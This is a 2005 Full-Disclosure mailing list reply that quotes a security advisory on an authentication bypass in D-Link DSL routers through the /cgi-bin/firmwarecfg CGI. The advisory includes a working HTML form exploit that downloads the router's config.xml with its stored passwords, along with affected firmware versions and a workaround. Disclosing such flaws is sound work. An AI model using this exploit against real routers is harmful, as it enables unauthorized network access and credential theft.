Re: D-Link DSL routers authentication bypass

[Sebastian von Knorring <Sebastian.von.Knorring () iki fi>]

Hello.


Could the D-Link DI-604 story at

<http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2>

be related to this vulnerability?

I have myself also a DI-604 that broke down in exactly the same way as described
above and the above was the only similar case I have yet found on the net.

My suspicion was also that the box had been hacked and your vulnerability post
now shows that exploitable holes in D-Link boxes exist.


-Sebastian


On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <francesco.orro () akhela com> wrote:

> ====================== SUMMARY ========================
>
>           Title: D-Link DSL routers authentication bypass
>            Date: 19 May 2005
>          Author: Francesco Orro <francesco.orro 4t akhela.com>
>
>         Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
>          Vendor: D-Link
>      Vendor URL: http://www.dlink.com
>   Vendor Status: D-Link was conctacted
>         Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
>                  various firmwares versions
>            Risk: High
>          Impact: Unauthorized people may gain full access to the device
>
> Vulnerability Description: an undocumented feature allows (in some
> cases) to bypass the authentication prompt and gain full access to the
> router, and than to the network behind it.
>
>
> ====================== BACKGROUND ========================
>
> D-Link DSL routers are commonly used for internet connectivity for home
> or small office needs. (http://www.dlink.com/products/)
>
>
> =============== PROBLEM DESCRIPTION ==================
>
> The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of
> the
> file fw_ip under /var/tmp/. If this file exists, all IP addresses
> listed
> inside it are given straight access to the device, without the need for
> authentication. If this file doesn't exists, the CGI creates a new one,
> putting the requesting address inside.
>
> If the web configuration console is accessible from internet and if
> nobody have never called the CGI before (es: from a workstation inside
> the LAN), then everybody can gain access to the router, download the
> config.xml file which contains users account and passwords, have access
> to the private network, modify or alter the firmware of the router,
> etc.
>
>
> ================ ADDITIONAL DETAILS ==================
>
> Vulnerability was found on the following firmware versions:
>
> V1.00B01T16.EN.20040211
> V1.00B01T16.EU.20040217
> V0.00B01T04.UK.20040220
> V1.00B01T16.EN.20040226
> V1.00B02T02.EU.20040610
> V1.00B02T02.UK.20040618
> V1.00B02T02.EU.20040729
> V1.00B02T02.DE.20040813
> V1.00B02T02.RU.20041014
>
> Can be exploited by a simple HTTP POST with the form:
>
> <html>
> <head>Download config.xml:<title>GetConfig - Config file 
> download</title></head>
> <body>
>
> <script lang="javascript">
> function invia_richiesta()
> {
>         document.DownloadConfig.action='http://'+document.InputBox.Host.
> value+'/cgi-bin/firmwarecfg';
>         document.DownloadConfig.submit();
> }
> </script>
>
> <form name="InputBox">
> <br>http://<input Name="Host" type="text" v
> value="">/cgi-bin/firmwarecfg<br>
> </form>
> <form name="DownloadConfig" method="POST" action="" 
> enctype="multipart/form-data">
>           <input type="Submit" name="config" value="Download" 
> onClick="javascript:invia_richiesta();"><br>
> </form>
>
> </body>
> </html>
>
>
> =================== FIX INFORMATION ===================
>
> Actually there is no solution to problem due to the fact that it seems
> an hidden feature.
> The work around is to call the CGI /cgi-bin/firmwarecfg from a known
> address of the local network and/or disable web console access from the
> internet.
>
>
> ================ AUTHOR INFORMATION ================
>
> Francesco Orro
> Akhela S.r.l. - Operation Group
> http://www.akhela.com/
>
> EMail: francesco.orro 4t akhela.com
> KeyID: 6CF46D45
>
>
> =================== DISCLOSURE HISTORY =====================
>
>  2 May 2005 - First private release of this advisory;
>  4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
>               of the vulnerability;
>  5 May 2005 - The vendor replid that the problem was resolved on
>               firmware version V1.00B02T02.EU.20040610, but has been
>               demostrated that this version is vulnerable too;
> 19 May 2005 - Public release of this advisory.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/